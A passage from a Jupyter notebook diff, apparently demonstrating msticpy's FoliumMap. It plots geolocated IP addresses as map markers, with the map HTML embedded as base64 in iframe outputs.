mljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2YwNDBkZTI2YzM3NDQ1ZmY4YmFjODk5ZTgwYWJhMTVjLnNldEljb24oaWNvbl8zNjFmYmI1MGU5ZDc0NDcxYWExYzlmZDRhMzVkODNkYyk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfMGM2MDUzODdkMWY1NDdmNmFmNTAxNDJmMjZjZmNmODIgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2FiMWFhYTY1ODc1MTRiYzNiM2QwYTg4NGYxY2NlMWMwID0gJChgPGRpdiBpZD0iaHRtbF9hYjFhYWE2NTg3NTE0YmMzYjNkMGE4ODRmMWNjZTFjMCIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMy42Ny4xNDMuMTE3PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzBjNjA1Mzg3ZDFmNTQ3ZjZhZjUwMTQyZjI2Y2ZjZjgyLnNldENvbnRlbnQoaHRtbF9hYjFhYWE2NTg3NTE0YmMzYjNkMGE4ODRmMWNjZTFjMCk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl9mMDQwZGUyNmMzNzQ0NWZmOGJhYzg5OWU4MGFiYTE1Yy5iaW5kUG9wdXAocG9wdXBfMGM2MDUzODdkMWY1NDdmNmFmNTAxNDJmMjZjZmNmODIpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl9mMDQwZGUyNmMzNzQ0NWZmOGJhYzg5OWU4MGFiYTE1Yy5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBEZXMgTW9pbmVzLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyX2EwY2U5OTk1MDUzYzQ4ZTA4NzA5NzNlNjVhYTQ0ZmI0ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbNDEuNjAwNiwgLTkzLjYxMTJdLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2M1NTFjMWYwZjZjYjQ3OGViNmJjOGQ4MmU0MzUwNTA5ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl9hMGNlOTk5NTA1M2M0OGUwODcwOTczZTY1YWE0NGZiNC5zZXRJY29uKGljb25fYzU1MWMxZjBmNmNiNDc4ZWI2YmM4ZDgyZTQzNTA1MDkpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzdiY2E1MWViYTA1NjRkYzdiMDk3MmY4NDBjODVhNDQ1ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF80NTA2NjJjMTRmYjk0NjYwYjJkNzZhODdkNzY5MGZlYiA9ICQoYDxkaXYgaWQ9Imh0bWxfNDUwNjYyYzE0ZmI5NDY2MGIyZDc2YTg3ZDc2OTBmZWIiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1Jb3dhLCBDaXR5PURlcyBNb2luZXMsIExvbmdpdHVkZT0tOTMuNjExMiwgTGF0aXR1ZGU9NDEuNjAwNiwgVHlwZT1nZW9sb2NhdGlvbjxicj5JUDogNTIuMTY1LjE3MC4xMTI8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfN2JjYTUxZWJhMDU2NGRjN2IwOTcyZjg0MGM4NWE0NDUuc2V0Q29udGVudChodG1sXzQ1MDY2MmMxNGZiOTQ2NjBiMmQ3NmE4N2Q3NjkwZmViKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2EwY2U5OTk1MDUzYzQ4ZTA4NzA5NzNlNjVhYTQ0ZmI0LmJpbmRQb3B1cChwb3B1cF83YmNhNTFlYmEwNTY0ZGM3YjA5NzJmODQwYzg1YTQ0NSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2EwY2U5OTk1MDUzYzQ4ZTA4NzA5NzNlNjVhYTQ0ZmI0LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIERlcyBNb2luZXMsIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMGViN2RhZTU0ZjZlNDdhN2I5ZTI0YzhmN2MxMGNmOGQgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0MS42MDA2LCAtOTMuNjExMl0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fZTY2MDVjYzY4ODgxNGVlMzhmMDVkYWFiMmU4ZDQyOTIgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzBlYjdkYWU1NGY2ZTQ3YTdiOWUyNGM4ZjdjMTBjZjhkLnNldEljb24oaWNvbl9lNjYwNWNjNjg4ODE0ZWUzOGYwNWRhYWIyZThkNDI5Mik7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYTVmY2M4MmMyZDNkNGU1YzkwM2YxNTIzNTliODk1ZDYgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2JkYmUzZjM3MGQ5ZjQ3OTY4ZjhkZjgyYTU0ZmFkZGY1ID0gJChgPGRpdiBpZD0iaHRtbF9iZGJlM2YzNzBkOWY0Nzk2OGY4ZGY4MmE1NGZhZGRmNSIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPUlvd2EsIENpdHk9RGVzIE1vaW5lcywgTG9uZ2l0dWRlPS05My42MTEyLCBMYXRpdHVkZT00MS42MDA2LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA1Mi4xNzMuMjguMTc5PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwX2E1ZmNjODJjMmQzZDRlNWM5MDNmMTUyMzU5Yjg5NWQ2LnNldENvbnRlbnQoaHRtbF9iZGJlM2YzNzBkOWY0Nzk2OGY4ZGY4MmE1NGZhZGRmNSk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl8wZWI3ZGFlNTRmNmU0N2E3YjllMjRjOGY3YzEwY2Y4ZC5iaW5kUG9wdXAocG9wdXBfYTVmY2M4MmMyZDNkNGU1YzkwM2YxNTIzNTliODk1ZDYpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl8wZWI3ZGFlNTRmNmU0N2E3YjllMjRjOGY3YzEwY2Y4ZC5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBEZXMgTW9pbmVzLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzY3MDAzMjRjMmZlNDRjMTJiNzRiMGY3ZmU3YTBjMTY4ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzguNzA5NSwgLTc4LjE1MzldLAogICAgICAgICAgICAgICAge30KICAgICAgICAgICAgKS5hZGRUbyhtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMpOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBpY29uX2MxMDE3OWFlYjdmNjQxZTRiMDVjNjQwNWQ5NmVhNDg0ID0gTC5Bd2Vzb21lTWFya2Vycy5pY29uKAogICAgICAgICAgICAgICAgeyJleHRyYUNsYXNzZXMiOiAiZmEtcm90YXRlLTAiLCAiaWNvbiI6ICJpbmZvLXNpZ24iLCAiaWNvbkNvbG9yIjogIndoaXRlIiwgIm1hcmtlckNvbG9yIjogImJsdWUiLCAicHJlZml4IjogImdseXBoaWNvbiJ9CiAgICAgICAgICAgICk7CiAgICAgICAgICAgIG1hcmtlcl82NzAwMzI0YzJmZTQ0YzEyYjc0YjBmN2ZlN2EwYzE2OC5zZXRJY29uKGljb25fYzEwMTc5YWViN2Y2NDFlNGIwNWM2NDA1ZDk2ZWE0ODQpOwogICAgICAgIAogICAgCiAgICAgICAgdmFyIHBvcHVwXzcwYzUwMzQ5Y2QwYTQ0OGNhNDBkNTk5ZWI3ZjMwMjQ3ID0gTC5wb3B1cCh7Im1heFdpZHRoIjogIjEwMCUifSk7CgogICAgICAgIAogICAgICAgICAgICB2YXIgaHRtbF85MjdkMzA0MzM0NTI0YjRiYmNiNTA2ZjJjYjk3OGU0YSA9ICQoYDxkaXYgaWQ9Imh0bWxfOTI3ZDMwNDMzNDUyNGI0YmJjYjUwNmYyY2I5NzhlNGEiIHN0eWxlPSJ3aWR0aDogMTAwLjAlOyBoZWlnaHQ6IDEwMC4wJTsiPkNvdW50cnlDb2RlPVVTLCBDb3VudHJ5TmFtZT1Vbml0ZWQgU3RhdGVzLCBTdGF0ZT1WaXJnaW5pYSwgQ2l0eT1XYXNoaW5ndG9uLCBMb25naXR1ZGU9LTc4LjE1MzksIExhdGl0dWRlPTM4LjcwOTUsIFR5cGU9Z2VvbG9jYXRpb248YnI+SVA6IDUyLjE2OC4xMzguMTQ1PC9kaXY+YClbMF07CiAgICAgICAgICAgIHBvcHVwXzcwYzUwMzQ5Y2QwYTQ0OGNhNDBkNTk5ZWI3ZjMwMjQ3LnNldENvbnRlbnQoaHRtbF85MjdkMzA0MzM0NTI0YjRiYmNiNTA2ZjJjYjk3OGU0YSk7CiAgICAgICAgCgogICAgICAgIG1hcmtlcl82NzAwMzI0YzJmZTQ0YzEyYjc0YjBmN2ZlN2EwYzE2OC5iaW5kUG9wdXAocG9wdXBfNzBjNTAzNDljZDBhNDQ4Y2E0MGQ1OTllYjdmMzAyNDcpCiAgICAgICAgOwoKICAgICAgICAKICAgIAogICAgCiAgICAgICAgICAgIG1hcmtlcl82NzAwMzI0YzJmZTQ0YzEyYjc0YjBmN2ZlN2EwYzE2OC5iaW5kVG9vbHRpcCgKICAgICAgICAgICAgICAgIGA8ZGl2PgogICAgICAgICAgICAgICAgICAgICBXYXNoaW5ndG9uLCBVbml0ZWQgU3RhdGVzCiAgICAgICAgICAgICAgICAgPC9kaXY+YCwKICAgICAgICAgICAgICAgIHsic3RpY2t5IjogdHJ1ZX0KICAgICAgICAgICAgKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyX2IyNjgwMDk2ZjE5MzQyYTU5YzU4ZTQwYjQxYWNhODc2ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzYuNjUzNCwgLTc4LjM3NV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fZmU5NmQ1NjE2YTFjNDU0MjhmZWNlYjY4ZGU3NDkzYmEgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyX2IyNjgwMDk2ZjE5MzQyYTU5YzU4ZTQwYjQxYWNhODc2LnNldEljb24oaWNvbl9mZTk2ZDU2MTZhMWM0NTQyOGZlY2ViNjhkZTc0OTNiYSk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfYWUzMzZkOGY3MjNkNGVmMDhlNjA4MzQ2YjEyOGRiZDkgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2FlY2Q4MTg4NjdhMTQ5MDQ5NWVhZTJhNDljYzZkYTFjID0gJChgPGRpdiBpZD0iaHRtbF9hZWNkODE4ODY3YTE0OTA0OTVlYWUyYTQ5Y2M2ZGExYyIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVZpcmdpbmlhLCBDaXR5PUJveWR0b24sIExvbmdpdHVkZT0tNzguMzc1LCBMYXRpdHVkZT0zNi42NTM0LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiAxMy42OC45My4xMDk8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfYWUzMzZkOGY3MjNkNGVmMDhlNjA4MzQ2YjEyOGRiZDkuc2V0Q29udGVudChodG1sX2FlY2Q4MTg4NjdhMTQ5MDQ5NWVhZTJhNDljYzZkYTFjKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyX2IyNjgwMDk2ZjE5MzQyYTU5YzU4ZTQwYjQxYWNhODc2LmJpbmRQb3B1cChwb3B1cF9hZTMzNmQ4ZjcyM2Q0ZWYwOGU2MDgzNDZiMTI4ZGJkOSkKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyX2IyNjgwMDk2ZjE5MzQyYTU5YzU4ZTQwYjQxYWNhODc2LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIEJveWR0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAo8L3NjcmlwdD4= onload=\"this.contentDocument.open();this.contentDocument.write(atob(this.getAttribute('data-html')));this.contentDocument.close();\" allowfullscreen webkitallowfullscreen mozallowfullscreen></iframe></div></div>"
+      ],
+      "text/plain": [
+       "<msticpy.nbtools.foliummap.FoliumMap at 0x297d5fe2a88>"
+      ]
+     },
+     "execution_count": 16,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "fmap_ips = FoliumMap()\n",
+    "fmap_ips.add_ip_cluster(ip_entities=ip_ents[:20], color='blue')\n",
+    "fmap_ips.center_map()\n",
+    "fmap_ips"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Use different colors and icons"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-02-08T01:01:41.677086Z",
+     "start_time": "2020-02-08T01:01:41.609124Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div style=\"width:100%;\"><div style=\"position:relative;width:100%;height:0;padding-bottom:60%;\"><span style=\"color:#565656\">Make this Notebook Trusted to load map: File -> Trust Notebook</span><iframe src=\"about:blank\" style=\"position:absolute;width:100%;height:100%;left:0;top:0;border:none !important;\" data-html=PCFET0NUWVBFIGh0bWw+CjxoZWFkPiAgICAKICAgIDxtZXRhIGh0dHAtZXF1aXY9ImNvbnRlbnQtdHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPgogICAgCiAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgTF9OT19UT1VDSCA9IGZhbHNlOwogICAgICAgICAgICBMX0RJU0FCTEVfM0QgPSBmYWxzZTsKICAgICAgICA8L3NjcmlwdD4KICAgIAogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuanMiPjwvc2NyaXB0PgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS0xLjEyLjQubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9qcy9ib290c3RyYXAubWluLmpzIj48L3NjcmlwdD4KICAgIDxzY3JpcHQgc3JjPSJodHRwczovL2NkbmpzLmNsb3VkZmxhcmUuY29tL2FqYXgvbGlicy9MZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy8yLjAuMi9sZWFmbGV0LmF3ZXNvbWUtbWFya2Vycy5qcyI+PC9zY3JpcHQ+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuLmpzZGVsaXZyLm5ldC9ucG0vbGVhZmxldEAxLjYuMC9kaXN0L2xlYWZsZXQuY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vbWF4Y2RuLmJvb3RzdHJhcGNkbi5jb20vYm9vdHN0cmFwLzMuMi4wL2Nzcy9ib290c3RyYXAubWluLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL21heGNkbi5ib290c3RyYXBjZG4uY29tL2Jvb3RzdHJhcC8zLjIuMC9jc3MvYm9vdHN0cmFwLXRoZW1lLm1pbi5jc3MiLz4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0iaHR0cHM6Ly9tYXhjZG4uYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvNC42LjMvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIi8+CiAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL0xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLzIuMC4yL2xlYWZsZXQuYXdlc29tZS1tYXJrZXJzLmNzcyIvPgogICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSJodHRwczovL3Jhd2Nkbi5naXRoYWNrLmNvbS9weXRob24tdmlzdWFsaXphdGlvbi9mb2xpdW0vbWFzdGVyL2ZvbGl1bS90ZW1wbGF0ZXMvbGVhZmxldC5hd2Vzb21lLnJvdGF0ZS5jc3MiLz4KICAgIDxzdHlsZT5odG1sLCBib2R5IHt3aWR0aDogMTAwJTtoZWlnaHQ6IDEwMCU7bWFyZ2luOiAwO3BhZGRpbmc6IDA7fTwvc3R5bGU+CiAgICA8c3R5bGU+I21hcCB7cG9zaXRpb246YWJzb2x1dGU7dG9wOjA7Ym90dG9tOjA7cmlnaHQ6MDtsZWZ0OjA7fTwvc3R5bGU+CiAgICAKICAgICAgICAgICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwKICAgICAgICAgICAgICAgIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1ubyIgLz4KICAgICAgICAgICAgPHN0eWxlPgogICAgICAgICAgICAgICAgI21hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyB7CiAgICAgICAgICAgICAgICAgICAgcG9zaXRpb246IHJlbGF0aXZlOwogICAgICAgICAgICAgICAgICAgIHdpZHRoOiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgaGVpZ2h0OiAxMDAuMCU7CiAgICAgICAgICAgICAgICAgICAgbGVmdDogMC4wJTsKICAgICAgICAgICAgICAgICAgICB0b3A6IDAuMCU7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgIDwvc3R5bGU+CiAgICAgICAgCjwvaGVhZD4KPGJvZHk+ICAgIAogICAgCiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvbGl1bS1tYXAiIGlkPSJtYXBfMjNjNmJmYTBlY2ZkNDY3MjliZGE0OTE3ZTZmMWM4MWMiID48L2Rpdj4KICAgICAgICAKPC9ib2R5Pgo8c2NyaXB0PiAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjID0gTC5tYXAoCiAgICAgICAgICAgICAgICAibWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjIiwKICAgICAgICAgICAgICAgIHsKICAgICAgICAgICAgICAgICAgICBjZW50ZXI6IFszOS45MjQ3LCAtNzguODk3MjVdLAogICAgICAgICAgICAgICAgICAgIGNyczogTC5DUlMuRVBTRzM4NTcsCiAgICAgICAgICAgICAgICAgICAgem9vbTogMi41LAogICAgICAgICAgICAgICAgICAgIHpvb21Db250cm9sOiB0cnVlLAogICAgICAgICAgICAgICAgICAgIHByZWZlckNhbnZhczogZmFsc2UsCiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICk7CgogICAgICAgICAgICAKCiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIHRpbGVfbGF5ZXJfYjZkMTU2YzZjMGRlNDQ2NTliOGUyOTY4ZmFjOTQ1NDAgPSBMLnRpbGVMYXllcigKICAgICAgICAgICAgICAgICJodHRwczovL3tzfS50aWxlLm9wZW5zdHJlZXRtYXAub3JnL3t6fS97eH0ve3l9LnBuZyIsCiAgICAgICAgICAgICAgICB7ImF0dHJpYnV0aW9uIjogIkRhdGEgYnkgXHUwMDI2Y29weTsgXHUwMDNjYSBocmVmPVwiaHR0cDovL29wZW5zdHJlZXRtYXAub3JnXCJcdTAwM2VPcGVuU3RyZWV0TWFwXHUwMDNjL2FcdTAwM2UsIHVuZGVyIFx1MDAzY2EgaHJlZj1cImh0dHA6Ly93d3cub3BlbnN0cmVldG1hcC5vcmcvY29weXJpZ2h0XCJcdTAwM2VPRGJMXHUwMDNjL2FcdTAwM2UuIiwgImRldGVjdFJldGluYSI6IGZhbHNlLCAibWF4TmF0aXZlWm9vbSI6IDE4LCAibWF4Wm9vbSI6IDE4LCAibWluWm9vbSI6IDAsICJub1dyYXAiOiBmYWxzZSwgIm9wYWNpdHkiOiAxLCAic3ViZG9tYWlucyI6ICJhYmMiLCAidG1zIjogZmFsc2V9CiAgICAgICAgICAgICkuYWRkVG8obWFwXzIzYzZiZmEwZWNmZDQ2NzI5YmRhNDkxN2U2ZjFjODFjKTsKICAgICAgICAKICAgIAogICAgICAgICAgICB2YXIgbWFya2VyXzQ4YTU2ZGMyZGI5NzQ0OTlhMGY0ZTM5OTM0Mzk3MzY3ID0gTC5tYXJrZXIoCiAgICAgICAgICAgICAgICBbMzYuNjUzNCwgLTc4LjM3NV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fMDEzMDllZWRkZTkyNDU1ZjljMWRiYTU1N2ZhYTk3MzggPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOiAiZ2x5cGhpY29uIn0KICAgICAgICAgICAgKTsKICAgICAgICAgICAgbWFya2VyXzQ4YTU2ZGMyZGI5NzQ0OTlhMGY0ZTM5OTM0Mzk3MzY3LnNldEljb24oaWNvbl8wMTMwOWVlZGRlOTI0NTVmOWMxZGJhNTU3ZmFhOTczOCk7CiAgICAgICAgCiAgICAKICAgICAgICB2YXIgcG9wdXBfOTQwZDQ4OGI5NzMzNGNkYmEyN2MzMzllYTM5MDk2M2MgPSBMLnBvcHVwKHsibWF4V2lkdGgiOiAiMTAwJSJ9KTsKCiAgICAgICAgCiAgICAgICAgICAgIHZhciBodG1sX2MzNjVmYTgwNDQzNjQyNDFiMmI4YWI2M2ExOTRjOTgxID0gJChgPGRpdiBpZD0iaHRtbF9jMzY1ZmE4MDQ0MzY0MjQxYjJiOGFiNjNhMTk0Yzk4MSIgc3R5bGU9IndpZHRoOiAxMDAuMCU7IGhlaWdodDogMTAwLjAlOyI+Q291bnRyeUNvZGU9VVMsIENvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMsIFN0YXRlPVZpcmdpbmlhLCBDaXR5PUJveWR0b24sIExvbmdpdHVkZT0tNzguMzc1LCBMYXRpdHVkZT0zNi42NTM0LCBUeXBlPWdlb2xvY2F0aW9uPGJyPklQOiA2NS41NS40NC4xMDk8L2Rpdj5gKVswXTsKICAgICAgICAgICAgcG9wdXBfOTQwZDQ4OGI5NzMzNGNkYmEyN2MzMzllYTM5MDk2M2Muc2V0Q29udGVudChodG1sX2MzNjVmYTgwNDQzNjQyNDFiMmI4YWI2M2ExOTRjOTgxKTsKICAgICAgICAKCiAgICAgICAgbWFya2VyXzQ4YTU2ZGMyZGI5NzQ0OTlhMGY0ZTM5OTM0Mzk3MzY3LmJpbmRQb3B1cChwb3B1cF85NDBkNDg4Yjk3MzM0Y2RiYTI3YzMzOWVhMzkwOTYzYykKICAgICAgICA7CgogICAgICAgIAogICAgCiAgICAKICAgICAgICAgICAgbWFya2VyXzQ4YTU2ZGMyZGI5NzQ0OTlhMGY0ZTM5OTM0Mzk3MzY3LmJpbmRUb29sdGlwKAogICAgICAgICAgICAgICAgYDxkaXY+CiAgICAgICAgICAgICAgICAgICAgIEJveWR0b24sIFVuaXRlZCBTdGF0ZXMKICAgICAgICAgICAgICAgICA8L2Rpdj5gLAogICAgICAgICAgICAgICAgeyJzdGlja3kiOiB0cnVlfQogICAgICAgICAgICApOwogICAgICAgIAogICAgCiAgICAgICAgICAgIHZhciBtYXJrZXJfMDc5YzRjN2M3ZWY2NDUxYThlMDZlMzVkODM0Y2VmM2YgPSBMLm1hcmtlcigKICAgICAgICAgICAgICAgIFs0My42NjQ0LCAtNzkuNDE5NV0sCiAgICAgICAgICAgICAgICB7fQogICAgICAgICAgICApLmFkZFRvKG1hcF8yM2M2YmZhMGVjZmQ0NjcyOWJkYTQ5MTdlNmYxYzgxYyk7CiAgICAgICAgCiAgICAKICAgICAgICAgICAgdmFyIGljb25fMDEyMjBkNGRjYWY4NDlkOTk2MjUwMGQ0NDYwOWYxNGYgPSBMLkF3ZXNvbWVNYXJrZXJzLmljb24oCiAgICAgICAgICAgICAgICB7ImV4dHJhQ2xhc3NlcyI6ICJmYS1yb3RhdGUtMCIsICJpY29uIjogImluZm8tc2lnbiIsICJpY29uQ29sb3IiOiAid2hpdGUiLCAibWFya2VyQ29sb3IiOiAiYmx1ZSIsICJwcmVmaXgiOi